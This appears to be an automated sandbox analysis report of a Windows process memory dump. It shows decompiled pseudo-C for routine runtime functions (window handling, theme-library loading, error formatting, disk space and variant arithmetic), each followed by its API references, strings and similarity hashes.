E0045676C(void* __eax) { long _t21; int _t37; int _t39; struct HWND__* _t41; void* _t46; _t46 = __eax; _t1 = _t46 + 0x30; // 0x0 _t21 = IsIconic( *_t1); if(_t21 == 0) { E00455CBC(); _t2 = _t46 + 0x30; // 0x0 SetActiveWindow( *_t2); L00455DF8(_t46, 0); if( *((intOrPtr*)(_t46 + 0x44)) == 0 || *((char*)(_t46 + 0x5b)) == 0 && *((char*)( *((intOrPtr*)(_t46 + 0x44)) + 0x57)) == 0 || IsWindowEnabled(E004423F8( *((intOrPtr*)(_t46 + 0x44)))) == 0) { _t15 = _t46 + 0x30; // 0x0 _t21 = E004554C4( *_t15, 6, __eflags); } else { _t37 = E0044EDA8( *((intOrPtr*)(_t46 + 0x44))); _t39 = E0044ED88( *((intOrPtr*)(_t46 + 0x44))); _t41 = E004423F8( *((intOrPtr*)(_t46 + 0x44))); _t13 = _t46 + 0x30; // 0x0 SetWindowPos( *_t13, _t41, _t39, _t37, *( *((intOrPtr*)(_t46 + 0x44)) + 0x48), 0, 0x40); _t14 = _t46 + 0x30; // 0x0 _t21 = DefWindowProcA( *_t14, 0x112, 0xf020, 0); } if( *((short*)(_t46 + 0x142)) != 0) { return *((intOrPtr*)(_t46 + 0x140))(); } } return _t21; } 0x0045676d 0x0045676f 0x00456773 0x0045677a 0x00456782 0x00456787 0x0045678b 0x00456794 0x0045679d 0x0045680b 0x0045680e 0x004567c0 0x004567ce 0x004567d7 0x004567e0 0x004567e6 0x004567ea 0x004567fb 0x004567ff 0x004567ff 0x0045681b 0x00000000 0x00456825 0x0045681b 0x0045682c

APIs

IsIconic.USER32(00000000), ref: 00456773 SetActiveWindow.USER32(00000000,?,00456FB0), ref: 0045678B Part of subcall function 00455DF8: EnumWindows.USER32(00455D88,00000000), ref: 00455E22 Part of subcall function 00455DF8: ShowOwnedPopups.USER32(00000000,?,00455D88,00000000,?,?,00460C02,00456799,00000000,?,00456FB0), ref: 00455E51 IsWindowEnabled.USER32(00000000), ref: 004567B7 SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,00000000,00000040,00000000,00000000,?,00456FB0), ref: 004567EA DefWindowProcA.USER32(00000000,00000112,0000F020,00000000,00000000,00000000,00000000,00000000,?,00000000,00000040,00000000,00000000,?,00456FB0), ref: 004567FF

Memory Dump Source

Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$ActiveEnabledEnumIconicOwnedPopupsProcShowWindows String ID: API String ID: 2995439034-0 Opcode ID: cdb4102744cc381e5219f4535f74b344f238140cf9e233f1330de880dcf3e2ad Instruction ID: 918584e1bd2c51baab3052e0e12fbe46b2eccfde8c42c3220052cef7c0f72eaf Opcode Fuzzy Hash: cdb4102744cc381e5219f4535f74b344f238140cf9e233f1330de880dcf3e2ad Instruction Fuzzy Hash: B011EF70A012009BEB54FF6ACAC6B5637A96F04305F4900BABE04DF29BD67DDC849728

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%

E004552FC(void* __edx) { struct tagPOINT _v12; void* _t5; long _t6; void* _t17; void* _t20; _t20 = __edx; *0x466590 = GetCurrentThreadId(); L5: _t5 = *0x466594; // 0x0 _t6 = WaitForSingleObject(_t5, 0x64); if(_t6 == 0x102) { if( *0x466580 != 0 && *((intOrPtr*)( *0x466580 + 0x60)) != 0) { GetCursorPos( &_v12); if(E00438F60( &_v12) == 0) { L00457D90( *0x466580, _t17, _t20); } } goto L5; } return _t6; } 0x004552fc 0x0045530d 0x0045533d 0x0045533f 0x00455345 0x0045534f 0x00455317 0x00455325 0x00455334 0x00455338 0x00455338 0x00455334 0x00000000 0x00455317 0x00455355

APIs

GetCurrentThreadId.KERNEL32 ref: 00455308 GetCursorPos.USER32(?,00000000,00000064), ref: 00455325 WaitForSingleObject.KERNEL32(00000000,00000064), ref: 00455345

Memory Dump Source

Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: CurrentCursorObjectSingleThreadWait String ID: API String ID: 1359611202-0 Opcode ID: df9f72933460e122f4bb00e301b80f85f47270db1344cf40ccb5259938aba5fc Instruction ID: a4966ca5ceb9285837f0d491413ca76e03b52f42b844403012d5ccc626bb1a15 Opcode Fuzzy Hash: df9f72933460e122f4bb00e301b80f85f47270db1344cf40ccb5259938aba5fc Instruction Fuzzy Hash: 69F0E9711043049BDB10E755E887B6973E8AB04355F41057BED09DA1D3FBBDA848C61E

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%

E0043F5F4(void* __eax, void* __ecx, void* __edx, void* __eflags) { intOrPtr _v16; char _v19; char _v20; signed int _v24; intOrPtr _v28; char _v32; char _v288; short _v292; char _v296; short _v298; short _v300; intOrPtr _v304; char _v308; signed int _t42; void* _t44; void* _t54; void* _t58; void* _t60; void* _t69; void* _t78; void* _t79; _t70 = __ecx; _t69 = __ecx; _t78 = __edx; _t79 = __eax; _v300 = E0040692C(GetMessagePos(), _t70); _v296 = _v300; _v292 = _v298; E0043A55C(_t79, &_v296, &_v296); if(_t69 == 0) { _t69 = E0043F530(_t79, 0, &_v308, 0, 0); } if(_t69 == 0) { return 0; } else { if(_t79 == _t69) { _v32 = _v308; _v28 = _v304; } else { _v32 = _v308 - *((intOrPtr*)(_t69 + 0x40)); _v28 = _v304 - *((intOrPtr*)(_t69 + 0x44)); } _v24 = *(_t78 + 8) & 0x0000ffff; _v16 = *((intOrPtr*)(_t78 + 4)); _t42 = *(_t78 + 0xa) & 0x0000ffff; if(_t42 >= 0x201) { _t44 = _t42 + 0xfffffdff - 2; if(_t44 < 0) { goto L15; } _t54 = _t44 - 0xffffffffffffffff; if(_t54 < 0) { goto L17; } if(_t54 - 0xffffffffffffffff < 0) { goto L16; } goto L18; } else { _t58 = _t42 + 0xffffff5f - 2; if(_t58 < 0) { L15: _v20 = 0; L19: GetKeyboardState( &_v288); _v19 = E0044CD28( &_v288); *((intOrPtr*)(_t78 + 0xc)) = E0043BC9C(_t69, 0, 0xb04b, &_v32); return 1; } _t60 = _t58 - 0xffffffffffffffff; if(_t60 < 0) { L17: _v20 = 1; goto L19; } if(_t60 - 0xffffffffffffffff < 0) { L16: _v20 = 2; goto L19; } L18: _v20 = 0; goto L19; } } } 0x0043f5f4 0x0043f5fd 0x0043f5ff 0x0043f601 0x0043f60d 0x0043f616 0x0043f61f 0x0043f62b 0x0043f632 0x0043f645 0x0043f645 0x0043f649 0x00000000 0x0043f64f 0x0043f651 0x0043f673 0x0043f67e 0x0043f653 0x0043f659 0x0043f667 0x0043f667 0x0043f689 0x0043f693 0x0043f69a 0x0043f6a3 0x0043f6c2 0x0043f6c5 0x00000000 0x00000000 0x0043f6c8 0x0043f6cb 0x00000000 0x00000000 0x0043f6d1 0x00000000 0x00000000 0x00000000 0x0043f6a5 0x0043f6aa 0x0043f6ad 0x0043f6d5 0x0043f6d5 0x0043f6fb 0x0043f700 0x0043f70e 0x0043f72b 0x00000000 0x0043f72e 0x0043f6b0 0x0043f6b3 0x0043f6e9 0x0043f6e9 0x00000000 0x0043f6e9 0x0043f6b9 0x0043f6df 0x0043f6df 0x00000000 0x0043f6df 0x0043f6f3 0x0043f6f3 0x00000000 0x0043f6f3 0x0043f6a3

APIs

GetMessagePos.USER32 ref: 0043F603 GetKeyboardState.USER32(?,?,?,?,0043FB78), ref: 0043F700

Memory Dump Source

Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: KeyboardMessageState String ID: API String ID: 3083355189-0 Opcode ID: b6d24466fa283e69023aa28bffdab9142aa89afd53d3c3f9af6c6c5c405a14b8 Instruction ID: 76d5227df02404bb1af155c9e6ea0e57d13ec3578cb87ddf304989c338bfe391 Opcode Fuzzy Hash: b6d24466fa283e69023aa28bffdab9142aa89afd53d3c3f9af6c6c5c405a14b8 Instruction Fuzzy Hash: 8F318C719087429AC724CF39C58679EBAD4AB8D314F005A3FE589C2291D738C80A879B

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 58%

E00426B6C(void* __ebx) { char _v260; char _v264; long _t21; void* _t22; intOrPtr _t27; void* _t32; _v264 = 0; _push(_t32); _push(0x426c08); _push( *[fs:eax]); *[fs:eax] = _t32 + 0xfffffefc; _t21 = GetLastError(); if(_t21 == 0 || FormatMessageA(0x1000, 0, _t21, 0x400, &_v260, 0x100, 0) == 0) { E00426B18(_t22); } else { E004049AC( &_v264, 0x100, &_v260); E0040C11C(_v264, 1); E00404184(); } _pop(_t27); *[fs:eax] = _t27; _push(0x426c0f); return E0040473C( &_v264); } 0x00426b78 0x00426b80 0x00426b81 0x00426b86 0x00426b89 0x00426b91 0x00426b95 0x00426bea 0x00426bbb 0x00426bcc 0x00426bde 0x00426be3 0x00426be3 0x00426bf1 0x00426bf4 0x00426bf7 0x00426c07

APIs

GetLastError.KERNEL32(00000000,00426C08), ref: 00426B8C FormatMessageA.KERNEL32(00001000,00000000,00000000,00000400,?,00000100,00000000,00000000,00426C08), ref: 00426BB2

Memory Dump Source

Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorFormatLastMessage String ID: API String ID: 3479602957-0 Opcode ID: 20eca826a7c097c8b561a1868e70621d2d596527ff6c5eb6183a51e80d6d6c18 Instruction ID: b393943444db6a942bd8341528f497628a2ff302c99bfacefed951aae1c827a6 Opcode Fuzzy Hash: 20eca826a7c097c8b561a1868e70621d2d596527ff6c5eb6183a51e80d6d6c18 Instruction Fuzzy Hash: CE01D8703042645FD711EB619C92BD6769CE758704F9240BBFA44E61C1DAB8AD80891D

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%

E00408F92(CHAR* _a4, intOrPtr* _a8, intOrPtr* _a12) { long _v8; long _v12; long _v16; long _v20; intOrPtr _v24; signed int _v28; CHAR* _t25; int _t26; intOrPtr _t31; intOrPtr _t34; intOrPtr* _t39; intOrPtr* _t40; intOrPtr _t48; intOrPtr _t50; _t25 = _a4; if(_t25 == 0) { _t25 = 0; } _t26 = GetDiskFreeSpaceA(_t25, &_v8, &_v12, &_v16, &_v20); _v28 = _v8 * _v12; _v24 = 0; _t48 = _v24; _t31 = E00405670(_v28, _t48, _v16, 0); _t39 = _a8; *_t39 = _t31; *((intOrPtr*)(_t39 + 4)) = _t48; _t50 = _v24; _t34 = E00405670(_v28, _t50, _v20, 0); _t40 = _a12; *_t40 = _t34; *((intOrPtr*)(_t40 + 4)) = _t50; return _t26; } 0x00408f9b 0x00408fa0 0x00408fa2 0x00408fa2 0x00408fb5 0x00408fc4 0x00408fc7 0x00408fd4 0x00408fd7 0x00408fdc 0x00408fdf 0x00408fe1 0x00408fee 0x00408ff1 0x00408ff6 0x00408ff9 0x00408ffb 0x00409004

APIs

GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 00408FB5

Memory Dump Source

Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: DiskFreeSpace String ID: API String ID: 1705453755-0 Opcode ID: fd7e4852e65e4fe4502a6f5f1eb3a7c032a299f34ea1f18f9356765824f4356f Instruction ID: 6f789f464a735fbe4a3b0839b11ba0241dbfa5aa8f99d2b0949e2c0092c0a836 Opcode Fuzzy Hash: fd7e4852e65e4fe4502a6f5f1eb3a7c032a299f34ea1f18f9356765824f4356f Instruction Fuzzy Hash: AE1100B5A00209AFDB00CFA9C981DAFB7F9EFC8314B54C569A409E7250E6319E018BA0

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 90%

E0042B5CC(void* __ebx, void* __ecx) { char _v5; intOrPtr _t2; intOrPtr _t6; intOrPtr _t108; intOrPtr _t111; _t2 = *0x466474; // 0x270a870 E0042B3FC(_t2); _push(_t111); _push(0x42b97f); _push( *[fs:eax]); *[fs:eax] = _t111; *0x466470 = *0x466470 + 1; if( *0x46646c == 0) { *0x46646c = LoadLibraryA("uxtheme.dll"); if( *0x46646c > 0) { *0x4663ac = GetProcAddress( *0x46646c, "OpenThemeData"); *0x4663b0 = GetProcAddress( *0x46646c, "CloseThemeData"); *0x4663b4 = GetProcAddress( *0x46646c, "DrawThemeBackground"); *0x4663b8 = GetProcAddress( *0x46646c, "DrawThemeText"); *0x4663bc = GetProcAddress( *0x46646c, "GetThemeBackgroundContentRect"); *0x4663c0 = GetProcAddress( *0x46646c, "GetThemeBackgroundContentRect"); *0x4663c4 = GetProcAddress( *0x46646c, "GetThemePartSize"); *0x4663c8 = GetProcAddress( *0x46646c, "GetThemeTextExtent"); *0x4663cc = GetProcAddress( *0x46646c, "GetThemeTextMetrics"); *0x4663d0 = GetProcAddress( *0x46646c, "GetThemeBackgroundRegion"); *0x4663d4 = GetProcAddress( *0x46646c, "HitTestThemeBackground"); *0x4663d8 = GetProcAddress( *0x46646c, "DrawThemeEdge"); *0x4663dc = GetProcAddress( *0x46646c, "DrawThemeIcon"); *0x4663e0 = GetProcAddress( *0x46646c, "IsThemePartDefined"); *0x4663e4 = GetProcAddress( *0x46646c, "IsThemeBackgroundPartiallyTransparent"); *0x4663e8 = GetProcAddress( *0x46646c, "GetThemeColor"); *0x4663ec = GetProcAddress( *0x46646c, "GetThemeMetric"); *0x4663f0 = GetProcAddress( *0x46646c, "GetThemeString"); *0x4663f4 = GetProcAddress( *0x46646c, "GetThemeBool"); *0x4663f8 = GetProcAddress( *0x46646c, "GetThemeInt"); *0x4663fc = GetProcAddress( *0x46646c, "GetThemeEnumValue"); *0x466400 = GetProcAddress( *0x46646c, "GetThemePosition"); *0x466404 = GetProcAddress( *0x46646c, "GetThemeFont"); *0x466408 = GetProcAddress( *0x46646c, "GetThemeRect"); *0x46640c = GetProcAddress( *0x46646c, "GetThemeMargins"); *0x466410 = GetProcAddress( *0x46646c, "GetThemeIntList"); *0x466414 = GetProcAddress( *0x46646c, "GetThemePropertyOrigin"); *0x466418 = GetProcAddress( *0x46646c, "SetWindowTheme"); *0x46641c = GetProcAddress( *0x46646c, "GetThemeFilename"); *0x466420 = GetProcAddress( *0x46646c, "GetThemeSysColor"); *0x466424 = GetProcAddress( *0x46646c, "GetThemeSysColorBrush"); *0x466428 = GetProcAddress( *0x46646c, "GetThemeSysBool"); *0x46642c = GetProcAddress( *0x46646c, "GetThemeSysSize"); *0x466430 = GetProcAddress( *0x46646c, "GetThemeSysFont"); *0x466434 = GetProcAddress( *0x46646c, "GetThemeSysString"); *0x466438 = GetProcAddress( *0x46646c, "GetThemeSysInt"); *0x46643c = GetProcAddress( *0x46646c, "IsThemeActive"); *0x466440 = GetProcAddress( *0x46646c, "IsAppThemed"); *0x466444 = GetProcAddress( *0x46646c, "GetWindowTheme"); *0x466448 = GetProcAddress( *0x46646c, "EnableThemeDialogTexture"); *0x46644c = GetProcAddress( *0x46646c, "IsThemeDialogTextureEnabled"); *0x466450 = GetProcAddress( *0x46646c, "GetThemeAppProperties"); *0x466454 = GetProcAddress( *0x46646c, "SetThemeAppProperties"); *0x466458 = GetProcAddress( *0x46646c, "GetCurrentThemeName"); *0x46645c = GetProcAddress( *0x46646c, "GetThemeDocumentationProperty"); *0x466460 = GetProcAddress( *0x46646c, "DrawThemeParentBackground"); *0x466464 = GetProcAddress( *0x46646c, "EnableTheming"); } } _v5 = *0x46646c > 0; _pop(_t108); *[fs:eax] = _t108; _push(0x42b986); _t6 = *0x466474; // 0x270a870 return E0042B404(_t6); } 0x0042b5d6 0x0042b5db 0x0042b5e2 0x0042b5e3 0x0042b5e8 0x0042b5eb 0x0042b5ee 0x0042b5f7 0x0042b607 0x0042b60c 0x0042b61f 0x0042b631 0x0042b643 0x0042b655 0x0042b667 0x0042b679 0x0042b68b 0x0042b69d 0x0042b6af 0x0042b6c1 0x0042b6d3 0x0042b6e5 0x0042b6f7 0x0042b709 0x0042b71b 0x0042b72d 0x0042b73f 0x0042b751 0x0042b763 0x0042b775 0x0042b787 0x0042b799 0x0042b7ab 0x0042b7bd 0x0042b7cf 0x0042b7e1 0x0042b7f3 0x0042b805 0x0042b817 0x0042b829 0x0042b83b 0x0042b84d 0x0042b85f 0x0042b871 0x0042b883 0x0042b895 0x0042b8a7 0x0042b8b9 0x0042b8cb 0x0042b8dd 0x0042b8ef 0x0042b901 0x0042b913 0x0042b925 0x0042b937 0x0042b949 0x0042b95b 0x0042b95b 0x0042b60c 0x0042b963 0x0042b969 0x0042b96c 0x0042b96f 0x0042b974 0x0042b97e

APIs

LoadLibraryA.KERNEL32(uxtheme.dll,00000000,0042B97F), ref: 0042B602 GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0042B61A GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0042B62C GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0042B63E GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0042B650 GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0042B662 GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0042B674 GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0042B686 GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0042B698 GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0042B6AA GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0042B6BC GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0042B6CE GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0042B6E0 GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0042B6F2 GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0042B704 GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0042B716 GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0042B728 GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0042B73A GetProcAddress.KERNEL32(00000000,GetThemeString), ref: 0042B74C GetProcAddress.KERNEL32(00000000,GetThemeBool), ref: 0042B75E GetProcAddress.KERNEL32(00000000,GetThemeInt), ref: 0042B770 GetProcAddress.KERNEL32(00000000,GetThemeEnumValue), ref: 0042B782 GetProcAddress.KERNEL32(00000000,GetThemePosition), ref: 0042B794 GetProcAddress.KERNEL32(00000000,GetThemeFont), ref: 0042B7A6 GetProcAddress.KERNEL32(00000000,GetThemeRect), ref: 0042B7B8 GetProcAddress.KERNEL32(00000000,GetThemeMargins), ref: 0042B7CA GetProcAddress.KERNEL32(00000000,GetThemeIntList), ref: 0042B7DC GetProcAddress.KERNEL32(00000000,GetThemePropertyOrigin), ref: 0042B7EE GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 0042B800 GetProcAddress.KERNEL32(00000000,GetThemeFilename), ref: 0042B812 GetProcAddress.KERNEL32(00000000,GetThemeSysColor), ref: 0042B824 GetProcAddress.KERNEL32(00000000,GetThemeSysColorBrush), ref: 0042B836 GetProcAddress.KERNEL32(00000000,GetThemeSysBool), ref: 0042B848 GetProcAddress.KERNEL32(00000000,GetThemeSysSize), ref: 0042B85A GetProcAddress.KERNEL32(00000000,GetThemeSysFont), ref: 0042B86C GetProcAddress.KERNEL32(00000000,GetThemeSysString), ref: 0042B87E GetProcAddress.KERNEL32(00000000,GetThemeSysInt), ref: 0042B890 GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0042B8A2 GetProcAddress.KERNEL32(00000000,IsAppThemed), ref: 0042B8B4 GetProcAddress.KERNEL32(00000000,GetWindowTheme), ref: 0042B8C6 GetProcAddress.KERNEL32(00000000,EnableThemeDialogTexture), ref: 0042B8D8 GetProcAddress.KERNEL32(00000000,IsThemeDialogTextureEnabled), ref: 0042B8EA GetProcAddress.KERNEL32(00000000,GetThemeAppProperties), ref: 0042B8FC GetProcAddress.KERNEL32(00000000,SetThemeAppProperties), ref: 0042B90E GetProcAddress.KERNEL32(00000000,GetCurrentThemeName), ref: 0042B920 GetProcAddress.KERNEL32(00000000,GetThemeDocumentationProperty), ref: 0042B932 GetProcAddress.KERNEL32(00000000,DrawThemeParentBackground), ref: 0042B944 GetProcAddress.KERNEL32(00000000,EnableTheming), ref: 0042B956

Strings

GetThemeRect , xrefs: 0042B7B0 CloseThemeData , xrefs: 0042B624 DrawThemeBackground , xrefs: 0042B636 IsThemeBackgroundPartiallyTransparent , xrefs: 0042B70E GetThemeSysBool , xrefs: 0042B840 GetThemePartSize , xrefs: 0042B67E DrawThemeIcon , xrefs: 0042B6EA GetThemeSysColorBrush , xrefs: 0042B82E IsAppThemed , xrefs: 0042B8AC GetThemeFont , xrefs: 0042B79E EnableThemeDialogTexture , xrefs: 0042B8D0 GetThemeInt , xrefs: 0042B768 GetThemeDocumentationProperty , xrefs: 0042B92A GetThemeBool , xrefs: 0042B756 GetThemeBackgroundContentRect , xrefs: 0042B65A, 0042B66C GetThemeIntList , xrefs: 0042B7D4 GetThemePosition , xrefs: 0042B78C GetThemeSysInt , xrefs: 0042B888 SetThemeAppProperties , xrefs: 0042B906 GetThemePropertyOrigin , xrefs: 0042B7E6 uxtheme.dll , xrefs: 0042B5FD GetThemeSysString , xrefs: 0042B876 GetThemeMetric , xrefs: 0042B732 SetWindowTheme , xrefs: 0042B7F8 GetThemeMargins , xrefs: 0042B7C2 GetThemeSysColor , xrefs: 0042B81C GetThemeString , xrefs: 0042B744 GetCurrentThemeName , xrefs: 0042B918 GetThemeSysFont , xrefs: 0042B864 DrawThemeEdge , xrefs: 0042B6D8 OpenThemeData , xrefs: 0042B612 GetThemeTextExtent , xrefs: 0042B690 IsThemeActive , xrefs: 0042B89A GetThemeEnumValue , xrefs: 0042B77A GetThemeBackgroundRegion , xrefs: 0042B6B4 EnableTheming , xrefs: 0042B94E GetThemeSysSize , xrefs: 0042B852 GetWindowTheme , xrefs: 0042B8BE HitTestThemeBackground , xrefs: 0042B6C6 IsThemePartDefined , xrefs: 0042B6FC IsThemeDialogTextureEnabled , xrefs: 0042B8E2 GetThemeFilename , xrefs: 0042B80A DrawThemeText , xrefs: 0042B648 GetThemeColor , xrefs: 0042B720 GetThemeAppProperties , xrefs: 0042B8F4 GetThemeTextMetrics , xrefs: 0042B6A2 DrawThemeParentBackground , xrefs: 0042B93C

Memory Dump Source

Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$LibraryLoad String ID: CloseThemeData$DrawThemeBackground$DrawThemeEdge$DrawThemeIcon$DrawThemeParentBackground$DrawThemeText$EnableThemeDialogTexture$EnableTheming$GetCurrentThemeName$GetThemeAppProperties$GetThemeBackgroundContentRect$GetThemeBackgroundRegion$GetThemeBool$GetThemeColor$GetThemeDocumentationProperty$GetThemeEnumValue$GetThemeFilename$GetThemeFont$GetThemeInt$GetThemeIntList$GetThemeMargins$GetThemeMetric$GetThemePartSize$GetThemePosition$GetThemePropertyOrigin$GetThemeRect$GetThemeString$GetThemeSysBool$GetThemeSysColor$GetThemeSysColorBrush$GetThemeSysFont$GetThemeSysInt$GetThemeSysSize$GetThemeSysString$GetThemeTextExtent$GetThemeTextMetrics$GetWindowTheme$HitTestThemeBackground$IsAppThemed$IsThemeActive$IsThemeBackgroundPartiallyTransparent$IsThemeDialogTextureEnabled$IsThemePartDefined$OpenThemeData$SetThemeAppProperties$SetWindowTheme$uxtheme.dll API String ID: 2238633743-2910565190 Opcode ID: d1f5ae21772bde1dc101fc0c65939c113a2ac02c18929f536ac1eaa0c24a1e19 Instruction ID: 02f122594848a3c283428a16239ca51583220fa1077c2258b21d737a31e4475e Opcode Fuzzy Hash: d1f5ae21772bde1dc101fc0c65939c113a2ac02c18929f536ac1eaa0c24a1e19 Instruction Fuzzy Hash: 93A12EB0640734AFDB00EB65EC86A253FA8EB45704752067BF401DF295E7B9A850CB5E

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%

E0040E778() { struct HINSTANCE__* _v8; intOrPtr _t46; void* _t91; _v8 = GetModuleHandleA("oleaut32.dll"); *0x466228 = E0040E74C("VariantChangeTypeEx", E0040E2C4, _t91); *0x46622c = E0040E74C("VarNeg", E0040E2F4, _t91); *0x466230 = E0040E74C("VarNot", E0040E2F4, _t91); *0x466234 = E0040E74C("VarAdd", E0040E300, _t91); *0x466238 = E0040E74C("VarSub", E0040E300, _t91); *0x46623c = E0040E74C("VarMul", E0040E300, _t91); *0x466240 = E0040E74C("VarDiv", E0040E300, _t91); *0x466244 = E0040E74C("VarIdiv", E0040E300, _t91); *0x466248 = E0040E74C("VarMod", E0040E300, _t91); *0x46624c = E0040E74C("VarAnd", E0040E300, _t91); *0x466250 = E0040E74C("VarOr", E0040E300, _t91); *0x466254 = E0040E74C("VarXor", E0040E300, _t91); *0x466258 = E0040E74C("VarCmp", E0040E30C, _t91); *0x46625c = E0040E74C("VarI4FromStr", E0040E318, _t91); *0x466260 = E0040E74C("VarR4FromStr", E0040E384, _t91); *0x466264 = E0040E74C("VarR8FromStr", E0040E3F0, _t91); *0x466268 = E0040E74C("VarDateFromStr", E0040E45C, _t91); *0x46626c = E0040E74C("VarCyFromStr", E0040E4C8, _t91); *0x466270 = E0040E74C("VarBoolFromStr", E0040E534, _t91); *0x466274 = E0040E74C("VarBstrFromCy", E0040E5B4, _t91); *0x466278 = E0040E74C("VarBstrFromDate", E0040E624, _t91); _t46 = E0040E74C("VarBstrFromBool", E0040E698, _t91); *0x46627c = _t46; return _t46; } 0x0040e786 0x0040e79a 0x0040e7b0 0x0040e7c6 0x0040e7dc 0x0040e7f2 0x0040e808 0x0040e81e 0x0040e834 0x0040e84a 0x0040e860 0x0040e876 0x0040e88c 0x0040e8a2 0x0040e8b8 0x0040e8ce 0x0040e8e4 0x0040e8fa 0x0040e910 0x0040e926 0x0040e93c 0x0040e952 0x0040e962 0x0040e968 0x0040e96f

APIs

GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 0040E781 Part of subcall function 0040E74C: GetProcAddress.KERNEL32(00000000), ref: 0040E765

Strings

VarOr , xrefs: 0040E86B VarBstrFromBool , xrefs: 0040E95D VarBstrFromCy , xrefs: 0040E931 VarDiv , xrefs: 0040E813 VarNot , xrefs: 0040E7BB VarDateFromStr , xrefs: 0040E8EF VarIdiv , xrefs: 0040E829 VarXor , xrefs: 0040E881 VarCmp , xrefs: 0040E897 VarR4FromStr , xrefs: 0040E8C3 VarR8FromStr , xrefs: 0040E8D9 VarNeg , xrefs: 0040E7A5 VarAdd , xrefs: 0040E7D1 VarBoolFromStr , xrefs: 0040E91B VarCyFromStr , xrefs: 0040E905 oleaut32.dll , xrefs: 0040E77C VarBstrFromDate , xrefs: 0040E947 VariantChangeTypeEx , xrefs: 0040E78F VarSub , xrefs: 0040E7E7 VarI4FromStr , xrefs: 0040E8AD VarMod , xrefs: 0040E83F VarAnd , xrefs: 0040E855 VarMul , xrefs: 0040E7FD

Memory Dump Source

Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp Download File

Similarity

